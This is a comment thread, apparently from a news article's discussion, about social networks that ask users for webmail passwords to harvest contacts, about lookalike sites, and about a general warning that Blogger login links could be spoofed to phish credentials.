I'm not suprised at all about this and would like to expand a little on the bit about fraudsters setting up bogus social networking sites.

The bad practice i refer to is a marketing exercise used by a number of social networks. I'll mention a couple that I hate partoicularly: hi5.com and tickle.com

I was prompted to register to such sites when I received the same worded personal emails from my Yahoo! contacts. So I investigated...

Towards the end the registration process (or in the case of Tickle.com once you have finished a test) you are invited to submit your Yahoo!, MSN and AOL details to 'invite your friends' to the site. When you do this a script logs into your mail account, farms your contact list and sends out automated emails on your behalf.

This is dangerous because they promote the practice of giving out log in information to a third party. It's fair to say that big name social networks are trustworthy but it doesn't take much to set up a bogus version that offers the same functionality.

Tickle.com's TOS say that "If Tickle has reasonable grounds to suspect that you have shared your account access and password with another individual, Tickle has the right to terminate your account and refuse any refund."

One solution, if this is a problem, would be the likes of Yahoo! to prevent scripts logging into their accounts.

I hope something is done.

Computers/technology make things easier, for most everyone, wouldn't be much good otherwise would it ?

If you're dumb enough to get roped in ( creating a false trust is one thing, sending money another ) lets not give up yet more personal responsibility just because some sucker was born a minute ago. Scraped knees build character.

Anyone who uses the same password for a social site and anything with money involved is, quite simply, too stupid to be allowed on the net on their own anyway.

No sympathy whatsoever.

Keyloggers, trojans etc are a more serious worry, so I dont access my bank etc, except from a machine that I personally control the security on.

Blogger is a big security hole.

When you comment, it invites you to log in with your Google credentials. It would be the work of moments to make the comment link on a blog template go to a spoof page that collects these instead.

As a minimum, you could then read through email, issue password resets, etc.

Answers gratefully accepted - at LinkedIn.com

http://www.linkedin.com/answers/technology/information-technology/information-security/TCH_ITS_ISC/46748-7404330

If you lie to people on any forum you can build trust and then abuse that trust. Doe these guys really need press that badly that they would waste their time proving the obvious?

Great sites, if you like exposing your social / business schedule, contacts list and more to all and sundry state and private US authorities wishing to spy on you or use the exposed data to gain commercial advantage or insight into your life / business.